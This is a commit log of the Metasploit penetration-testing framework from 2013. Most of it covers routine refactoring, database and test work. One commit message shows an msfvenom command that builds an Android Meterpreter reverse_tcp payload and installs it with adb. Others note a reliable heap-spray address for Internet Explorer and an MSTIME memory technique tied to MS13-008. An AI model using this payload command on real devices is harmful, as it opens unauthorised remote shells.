fix typo in comment
...
change runing to running
2013-06-27 03:12:49 -05:00
31ad7b50a9
Fix write_file on FreeBSD
...
[SeeRM #8083 ]
2013-06-25 17:19:00 -05:00
c0fda81eb0
Removed options DB_ADD_ALL. Added options DB_ALL_PASS and DB_ALL_USERS
...
to add already known user and passwords to the lists.
2013-06-23 18:20:41 +02:00
3c42fe594e
No need to have rescue around a print
2013-06-21 15:55:43 -05:00
2c12a43e77
Add a method for dealing with hardcoded URIs
2013-06-21 15:48:02 -05:00
39d011780e
Move deletion into #remove_resource
...
Doing it here means that modules manually calling remove_resource won't
screw up the cleanup
2013-06-21 15:34:54 -05:00
e8a92eb196
Keep better track of resources
...
[See #1623 ]
[SeeRM #7692 ]
2013-06-21 14:51:47 -05:00
81b4efcdb8
Fix requires for PhpEXE
...
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
819080a147
Enable rhost/rport option overrides in HttpClient
2013-06-17 11:45:01 -05:00
d341b825d0
Rename dirbust option to conform to style
2013-06-14 12:58:08 -05:00
b509ac8504
Crawler mixin: Dirbusting opt moved to advanced
2013-06-13 00:04:31 +03:00
b474cda4aa
Crawler/Anemone: Dirbusting now optional
...
[FIXRM #8030 ]
Anemone updated to make dirbusting optional (on by default) and the Crawler core
module updated to provide an option to do so.
2013-06-13 00:00:09 +03:00
6a5d1d06b2
Make the conditional correct for print_prefix
...
Fixes a bug introduced on #1936 .
2013-06-11 16:16:17 -05:00
f775a0bb01
Handle single quotes for OpenVAS import
2013-06-10 19:45:50 -04:00
9a08090b0f
Inch toward making modules more testable
2013-06-10 16:02:19 -05:00
d4e9431633
Add Gemfile entry for PacketFu
2013-06-10 14:18:05 -05:00
6aa7c74fdd
make anemone also rspect domain
2013-06-07 14:24:14 -05:00
78b2a0a2ac
add domain support to web spider
2013-06-07 12:41:20 -05:00
8e2de6d14f
Updates js_property_spray documentation
...
After many tests, it turns out address 0x0c0d2020 is the most
consistent location acorss various IE versions. For dev purposes,
it's rather important to have this documented somewhere.
Thanks to corelanc0d3r for the data.
2013-06-07 00:28:22 -05:00
2e26256217
was missing a nil check
2013-06-04 14:21:07 -05:00
c4475538e7
Report on TaskSession associations
...
add TaskSession objects so when we report
on a session, we know what Task created it, if there
was a task
2013-06-04 13:42:36 -05:00
90117c322c
Landing #1874 - Post API cleanup
2013-05-31 16:15:23 -05:00
cc60c95243
Rescue Errno::ENONENT when using File.mtime for memory cache
...
[#47720609 ]
2013-05-30 13:16:43 -05:00
541d287e70
Merge branch 'master' into bug/module-load-cache-update
2013-05-30 12:59:50 -05:00
8b488c3c6b
Merge pull request #1866 from dmaloney-r7/bug/mdm_session_port
...
Add session_port to the mdm object
SEERM #7281
2013-05-30 10:05:48 -07:00
12f0448bb4
Use a LIKE test instead of equality
...
Fixes the ability to search for CVE (as well as other reference types)
with a non-exact match
[SeeRM #7989 ]
2013-05-29 16:27:33 -05:00
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
0466cce7b1
Move PostMixin to its own file
...
Also replaces dead code in lib/msf/core/exploit/local.rb with what was
actually being used for the Exploit::Local class that lived in
lib/msf/core/exploit.rb.
2013-05-28 15:46:06 -05:00
e20385dd9e
Merge pull request #1864 from dmaloney-r7/feature/task_associations/cred_service_host
...
Passes specs and functional tests
2013-05-28 12:11:57 -07:00
9843dc4cb4
Land #1708 , android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
849d974463
Add session_port to the mdm object
...
Mdm::Session was not being passed the session_port
FIXRM #7281
2013-05-24 17:46:03 -05:00
c22178752e
Merge branch 'master' into bug/module-load-cache-update
2013-05-24 11:06:16 -05:00
e169ccab4f
Landing #1862 - Remove inline unit tests
2013-05-23 22:19:29 -05:00
1a487e476d
Merge branch 'master' into bug/module-load-cache-update
2013-05-23 14:23:14 -05:00
0f21861921
Add task handling to imports
...
allow imports to carry along task info
[Story #49167601 ]
2013-05-23 13:33:19 -05:00
05916c079e
Inline unit tests are so last decade
...
Aside from codebase-wide changes, nearly all of these tests haven't been
touched since before 2010, and there is no effort to maintain this style
of testing. We've moved on to (correctly) seperating out our tests from
our codebase.
2013-05-23 12:41:14 -05:00
a852304ba3
DRY: Move check things to the common module level
...
While it makes lots of sense to bring check to all modules, of course
some modules will not be able to actually use it. Namely modules like
nop and payload modules. If you're feeling creative, you could probably
come up with semantically similar checks for those, too.
2013-05-23 11:42:41 -05:00
7436fdad72
First, copy-pasta and add a test
2013-05-23 11:26:53 -05:00
d8074c0bf4
Use create not new
...
Was calling .new instead of .create
[Story #49167601 ]
2013-05-22 18:29:22 -05:00
2b70ec2e08
Payload compatible cache_in_memory
...
[#47720609 ]
Msf::PayloadSet#add_module does NOT return an annotated module class as
Msf::ModuleSet#add_module does because a payload module is defined as a
ruby Module instead of a ruby Class. Since add_module doesn't always
return an annotated_class, the logic in
Msf::ModuleManager#on_module_load needed to change to NOT use
annotated_class and create #add_module as return [void]. Thus, it is
necessary to pass in all the metasploit module metadata to
Msf::ModuleManager#cache_in_memory instead of assuming they can be
derived from the (payload) Module or (other) Class.
2013-05-22 16:06:02 -05:00
69dd7f5c58
Update Mdm and Add Task stuff to report
...
make report_* methods aware of Tasks
[Story #49167601 ]
2013-05-22 14:59:43 -05:00
57576de85f
Update in-memory cache to fix file_changed?
...
[#47720609 ]
Msf::ModuleManager#module_info_by_path was not being updated when a
module was loaded, so if a load_module was called again, say during
start up of prosvc, the module would reload even though there was no
change in the file because file_changed? couldn't find an entry for the
module's path in module_info_by_path.
2013-05-22 12:28:42 -05:00
e2aad8930d
Landing #1853 - Remove ID tags
2013-05-22 12:12:55 -05:00
8483528ae0
Restore generic.rb to the correct state
2013-05-22 12:11:06 -05:00
1cf485fad1
Restore tcp.rb to its current state
2013-05-22 12:06:36 -05:00
eede80509f
Reuse appropriate terminology in docs
...
[#47720609 ]
Fix some docs and variable names to make it clearer when methods are
expecting module instance and module classes. Change some 'name'
variables to 'reference_name' since that's the proper terminology.
2013-05-21 08:19:47 -05:00
f4498c3916
Remove $Id tags
...
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
89bd5b4791
Reset column information after running migrations
...
[#50179803 ]
[SeeRM #7967 ]
[SeeRM #7870 ]
Because metasploit-framework runs migrations with the same process and
with the same connection as it later accesses the database, the column
information can become cached prematurely and be incorrect by the end of
the migrations. Fix the bad cache by automatically resetting the column
information for all model classes after the migrations have run.
2013-05-20 13:08:07 -05:00
398dcfa8cb
Merge branch 'master' into bug/migrations
2013-05-20 12:49:33 -05:00
0e435d378c
Move Msf::DBManager#migrate(d) to module
...
[#50179803 ]
Move Msf::DBManager#migrate and the migrated attribute to
Msf::DBManager::Migration module to lower complexity of db_manager.rb
and in preparation for more migration related code on this branch.
2013-05-20 12:45:17 -05:00
82867fbb66
Prevent duplicate migrations_paths
...
[#50099107 ]
If Msf::DBManager#initialize_metasploit_data_models is run multiple
times, such as during specs, ActiveRecord::Migrator.migrations_paths was
getting populated with multiple copies of the metasploit_data_models
db/migrate path, which would lead to 'DB.migrate threw an exception:
Multiple migrations have the version number 0' errors in framework.log.
2013-05-17 14:56:17 -05:00
61afe1449e
Landing #1275 , bash cmdstager
...
Conflicts:
lib/rex/exploitation/cmdstager.rb
Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
0a55c7e4b6
Proofs can be omitted if they contain sensitive data
2013-05-14 20:46:17 +03:00
a12e59ef1f
Merge branch 'master' into bug/web-match_and_log_fingerprint
2013-05-14 01:55:37 +03:00
f4bc3096b2
#match_and_log_fingerprint: store match not fingerprint
2013-05-10 19:59:12 +03:00
afa04ac9d0
Merge branch 'master' into feature/mdm-module-namespace
2013-05-09 16:13:06 -05:00
bc92b43408
Update to metasploit_data_models 0.11.0
...
[#47979793 ]
2013-05-09 13:25:26 -05:00
a5648a8830
Merge branch 'master' into feature/mdm-module-namespace
...
Conflicts:
Gemfile
Gemfile.lock
lib/msf/core/db_manager.rb
2013-05-08 13:22:41 -05:00
9ab68ac935
Fix unintelligible error when importing empty file
...
IO#read returns nil for an empty file if given a length argument, which
caused a stack trace when attempting to import a file instead of a
useful error message.
2013-05-07 18:05:45 -05:00
9e7885857c
Land #1776 , assembly payload blob cache fix
2013-05-02 16:58:14 -05:00
0d9b120bac
Get rid of the suffix
...
This makes blob cache a little cleaner
[FixRM #7898 ]
2013-05-02 16:55:14 -05:00
5cfc306466
Land @1785, @wchen-r7's API addition for the mstime ie8 technique
2013-05-02 00:00:49 -05:00
69f8103ffe
Make animatecolor element optional by using innerHTML
2013-05-01 14:21:52 -05:00
3d2cb9ec3f
Uses rand_text_hex for RGB values, and correcting exception handling
2013-05-01 13:41:36 -05:00
71afd762a9
According to MSFG, I can use RGB, so here goes
2013-04-30 18:48:21 -05:00
ae94fbdf6c
Updates documentation
2013-04-30 17:11:19 -05:00
9cc624456a
Adds function js_mstime_malloc
...
This function takes advantage of MSTIME's CTIMEAnimationBase::put_values
function that's suitable for a no-spray technique (based on wtfuzz's
PoC for MS13-008)
2013-04-30 16:40:10 -05:00
cf7702f7e9
"acitve" should be "aggressive"
...
fixes http://dev.metasploit.com/redmine/issues/7926 which prevented a
proper search using:
msf> search exploit:type app:server
2013-04-30 13:04:19 -05:00
906863676e
Fix a logic error in HttpServer
...
When a module is configured to listen on the INADDR_ANY interface, with
a payload that does not have an LHOST option, it attempts to determine
the srvhost from a client socket which would only be available when the
module has included the TcpClient mixin (i.e., it is both passive and
aggressive stance), causing a NameError for the undefined +sock+.
This commit fixes the problem in two ways:
1. It changes the default cli in get_uri to be the module's self.cli,
which should always be set when passive modules would need it (e.g., in
the on_request_uri method).
2. It adds a check to make sure that the calling module has a sock
before trying to get its peerhost. This was @marthieubean's suggested
solution in #1775 .
[Closes #1775 ]
2013-04-29 13:44:58 -05:00
21f8e19d55
Single Payloads Cache Assembled Payload Improperly
...
An earlier change to the framework (prepend_migrate) forced single
payloads to use the internal_generate method of payload.rb.
internal_generate calls build which has a cache to track assembled
payloads. This method assumes that a payload only needs to be
assembled once, with optional values patched in later.
Single payloads do not work this way. Each time they are generated
new assembly source is created with the options hardcoded in.
This fix updates build to use the hashcode of the assembly code as
part of the cache key.
This fixes #7898 -- a bug that prevents a user from generating
multiple variations of a single payload without a restart.
2013-04-29 11:54:53 -04:00
8bfaa41723
Fix x64 dll creation
2013-04-27 20:44:46 +01:00
249a09cd52
Update to metasploit_data_models 0.7.1
...
[#47979793 ]
2013-04-26 13:14:38 -05:00
b1e49e7116
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2013-04-25 20:54:28 -05:00
5b0ae1476b
Let's word this a little differently
2013-04-25 20:52:51 -05:00
b58a775af5
Added opt delay to file_dropper
2013-04-25 20:52:51 -05:00
008266a581
Corrects documentation. Thanks Meatballs1
2013-04-25 19:13:16 -05:00
ff87e3622b
Changes made according to feedback from Juan and James
2013-04-25 15:19:44 -05:00
6767eee08a
Add in-line signing
...
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
24b97137ea
Msf::DBManager Mdm::Module* specs
...
[#47979793 ]
2013-04-25 09:46:53 -05:00
6642545551
Adds new JavaScript function "js_download"
...
"js_download" is a JavaScript function used to download data (text
or binary) from the web server.
2013-04-24 17:36:45 -05:00
492b081280
Msf::DBManager::Export#extract_module_detail_info spec
...
[#47979793 ]
2013-04-20 16:44:42 -05:00
e5befb7094
Msf::DBManager#report_session specs
...
[#47979793 ]
2013-04-19 10:11:33 -05:00
25fcbd4e70
Landing #1733 , setting a sensible heapsray offset
...
@wchen-r7 says that nobody's using it today, much less relying on the
default, so this should make no functional difference to any browser
exploits.
2013-04-15 16:32:48 -05:00
7f8040c4e4
Lands #1722 , Rex::Socket comment docs
2013-04-15 13:44:00 -05:00
2c681005c0
Msf::ModuleManager::Cache spec coverage
...
[#47979793 ]
2013-04-15 13:08:12 -05:00
df9c5f4a80
remove unused resources and fix whitespace
2013-04-13 16:22:52 +01:00
2c41ca6598
Merge branch 'encoding_fix' of git://github.com/rsmudge/metasploit-framework
2013-04-12 21:10:44 -05:00
d28db8a2a3
Forgot the comment
2013-04-12 20:21:10 -05:00
f2cbbf43e8
Changes default offset
...
Points to the beginning of the block
2013-04-12 20:19:47 -05:00
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
6eb33ae5ed
Rex::Socket::SslTcp set cipher and verify_mode
...
Update Rex::Socket::SslTcp to accept verification mode string from
Rex::Socket::Parameters, which has been modified accordingly.
Add SSLVerifyMode and SSLCipher options (params and socket work
were done before, but the option was not exposed) to
Msf::Exploit::Tcp.
Testing:
```
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'NONE')
>> sock.sslctx.verify_mode
=> 0
>> sock.close
=> nil
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'PEER')
=> #<Socket:fd 13>
>> sock.sslctx.verify_mode
=> 1
```
Note: this should be able to resolve the recent SSL socket hackery
of exploit/linux/misc/nagios_nrpe_arguments.
2013-04-11 18:00:33 -04:00
6a0b240d10
Add some better docs for Rex::Socket
2013-04-10 12:41:41 -05:00
2949c4a339
enable stage encoding for reverse_http(s)
2013-04-10 12:10:17 -03:00
6a5d318749
Bumping version.
2013-04-10 08:59:56 -05:00
cd86a69090
Have Post::File use shiny new session.fs.file.mv
...
Also adds a quick and dirty test. Verified working on Linux shell, Linux
meterpreter, and Windows x86 and x64 meterpreter.
2013-04-05 01:24:24 -05:00
809969b49f
Merge branch 'master' into feature/patchable-web-vuln-import
2013-04-02 22:38:54 -05:00
0bb79ba890
Msf::DBManager#import_msf_xml refactor
...
[#46491831 ]
Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns. The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
2013-04-01 16:06:40 -05:00
2317e9cced
Fix yard tag warnings
...
[#46491831 ]
2013-03-30 17:13:12 -05:00
7ed2812ec3
Fix Cannot resolve link YARD warnings
...
[#46491831 ]
2013-03-30 16:58:49 -05:00
c210260845
Fix Undocumentable method, missing name YARD warning
...
[#46491831 ]
Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call. By removing the ##, the
warning disappeared. I did not determine what is special about ## in
file comments.
2013-03-30 15:32:38 -05:00
463725efec
Merge branch 'bug/winrm_poke' of github.com:dmaloney-r7/metasploit-framework into dmaloney-r7-bug/winrm_poke
2013-03-29 09:30:21 -05:00
380f5f56ae
Auxiliary::Web::HTTP#_request: print_error => elog
...
[SEERM #7839 ]
Reverted earlier commit.
2013-03-27 16:36:50 +02:00
a87e414274
fix winrm poke method
2013-03-26 13:05:33 -05:00
509ae76dc9
make sure we grab the workspace for store_local
...
store_local calls report note from db.rb directly instead of going
through the report method. this means we might miss the workspace
causing a stack trace
2013-03-22 16:52:38 -05:00
0634cb9892
Need to avoid badchar 0x00
...
0x00 becomes double null, which functions like a terminator
2013-03-22 13:18:32 -05:00
566806487c
Randomize the "div_container" var because it's global
...
It's best to randomize this variable name because it's global.
2013-03-22 13:16:14 -05:00
1ac31a3e12
Merge branch 'bug/web-path-api-update' of github.com:tasos-r7/metasploit-framework into tasos-r7-bug/web-path-api-update
2013-03-22 12:54:23 -05:00
cce74246d8
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-03-19 15:03:24 -05:00
11c38d925b
Auxiliary::Web::Path: Fuzzable API update
...
[FIXRM #7817 ]
Path object was using an outdated fuzzable API which was causing
scan errors.
2013-03-19 18:41:52 +02:00
ad39a5cdc3
Auxiliary::Web::HTTP#_request: elog => print_error
...
[SEERM #7815 ]
Switched form elog to print_error to make reporting bugs easier on users.
2013-03-19 17:18:44 +02:00
afcbaffa2b
Revert "add -R capability like hosts -R"
...
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.
This reverts commit 52596ae3b4
2013-03-18 15:28:19 -05:00
91e3f4cca6
Merge 'kernelsmith/msfconsole-grep'
...
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.
[Closes #1320 ]
Conflicts:
lib/msf/ui/console/command_dispatcher/core.rb
2013-03-18 14:39:45 -05:00
2075a7b46c
Remove active_record patch
...
[#46141013 ]
Version 3.2.12 of activerecord contains the changes that the original
patch made so the patch is no longer needed.
2013-03-18 11:32:21 -05:00
f9327d169b
msftidy
2013-03-17 14:31:40 -04:00
b6da5f84bb
Refactor
2013-03-17 14:09:00 -04:00
5967991f6f
Auxiliary::Web#log_*: details[:category] => #name
...
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
2013-03-12 19:43:47 +02:00
c641ca96c1
Auxiliary::Web::Path.from_model: inputs => form.inputs
...
Fixed uninitialized variable error.
2013-03-11 23:08:41 +02:00
d764740779
Convert user/pass tokens to ASCII in db.rb
...
This commit fixes an Encoding::CompatibilityError incompatible
encoding regexp match (ASCII-8BIT regexp with UTF-8 string) when
sanitizing non-printable tokens from a user/pass string.
The UTF-8 strings are derived from strings passed through the
module.execute RPC call.
2013-03-11 15:02:28 -04:00
756dec6fcc
Msftidy EXE
2013-03-10 20:56:21 +00:00
71a38b81dd
Added generation to Exploit::EXE
2013-03-10 20:54:37 +00:00
7e15788bb5
Auxiliary::Web: updated form of vuln storage in parent
...
#log_fingerprint and #log_resource now create a key in the
parent's #vulns attribute with the name of the vuln type and
store the details of each such vuln under it.
2013-03-08 22:38:23 +02:00
8b5a83c7f5
Remove the DECODER option
2013-03-08 15:25:16 -05:00
ac6065d8f9
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-08 21:50:49 +02:00
3422a7c098
Auxiliary::Web: force vuln proof to_s
2013-03-08 21:50:01 +02:00
aceba9fc8a
Revert "escape ticks and spaces in paths"
...
This reverts commit 4c87b1ba36
2013-03-08 14:37:28 -05:00
db676f1a88
Whitespace at EOL
2013-03-07 18:20:08 -06:00
cf3df4b179
Auxiliary::Web::HTTP: added error output
...
Instead of using elog when an HTTP request callback throws an
exception, use the HTTP class' parent #print_error.
2013-03-07 20:14:38 +02:00
d9a6f5f0ca
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-06 18:26:18 +02:00
c497d5ffef
Auxiliary::Web: log methods pass vuln info to parent
2013-03-06 18:25:25 +02:00
09fc52f3d9
Merge pull request #1536 from rapid7/feature/active-record-migrator-migrations-paths
...
Use ActiveRecord::Migrator multiple migrations paths support
2013-03-06 08:20:36 -08:00
24c0da0adb
Merge branch 'rapid7' into doc/cleanup-peparsey
2013-03-05 21:00:26 -06:00
27727df415
Merge branch 'R3dy-psexec-mixin2' into rapid7
2013-03-05 14:36:55 -06:00
a928e5f963
Whitespace
2013-03-05 14:34:56 -06:00
f5c23e4b02
fix typo snaffu
2013-03-05 12:35:21 -06:00
1407886e83
Revert "fix a major typo snaffu"
...
This reverts commit c639de7ccc
2013-03-05 12:34:51 -06:00
c639de7ccc
fix a major typo snaffu
2013-03-05 12:33:37 -06:00
ac63965e4d
Merge remote-tracking branch 'gerry/nbe_importing_fix' into rapid7
2013-03-04 20:00:50 -06:00
c0689a7d43
Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
2013-03-04 12:14:33 -06:00
6dcca7df78
Remove duplicated header issues
...
Headers were getting duped back into client config, causing invalid
requests to be sent out
2013-03-04 11:24:26 -06:00
0ddc6b3afa
Document Msf::DBManager#initialize_metasploit_data_models
2013-03-02 21:16:02 -06:00
c9a162ac33
Correct return type of Msf::DBManager#migrate.
2013-03-02 21:09:45 -06:00
af4b3fa287
Use ActiveRecord::Migrator multiple migrations paths support
...
[#44034071 ]
ActiveRecord::Migrator has a class attribute, migrations_paths,
specificially for storing a list of different directories that have
migrations in them. ActiveRecord::Migrator.migrations_paths is used in
rake db:load_config, which is a dependency of db:migrate, etc. that is
passed to ActiveRecord::Migrator.migrate. Since migrate supports an
array of directories, and not just a single directory, there is no need
to merge all the migrations paths into one temporary directory as was
previously done.
2013-03-02 20:33:48 -06:00
2e4760c486
Merge pull request #1533 from rapid7/feature/migrations-in-metasploit_data_models
...
All steps passing as described.
2013-03-01 12:54:41 -08:00
99a8ec593b
Fixing merge conflicts
2013-03-01 20:21:02 +02:00
4212c36566
Fix up basic auth madness
2013-03-01 11:59:02 -06:00
7b8654a71d
Revert "Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence"
...
This reverts commit 3840ddccbce1891f0836
2013-03-01 11:41:06 -06:00
3840ddccbc
Merge pull request #1534 from tasos-r7/bugfix/web-vuln-confidence
...
Auxiliary::Web: fixed confidence calculation in log methods
2013-03-01 09:25:07 -08:00
862b813786
Auxiliary::Web: fixed confidence calc in log methods
2013-03-01 18:33:16 +02:00
jvazquez-r7
Joe Vennix
scriptjunkie
Meatballs
sinn3r
RageLtMan
David Maloney
William Vu
Spencer McIntyre
James Lee
Tod Beardsley
lsanchez-r7
HD Moore
Niel Nielsen
OJ
Raphael Mudge
Samuel Huckins
yehualiu
Tod Beardsley
FireFart
b00stfr3ak
jvazquez-r7
Rob Fuller
Markus Wulftange
ZeroChaos
Joe Vennix
Tab Assassin
Brandon Turner
allfro
Alexandre Maloteaux
corelanc0d3r
Josh
Daniele Martini
Tasos Laskos
Luke Imhoff
sinn3r
kernelsmith
Tod Beardsley
timwr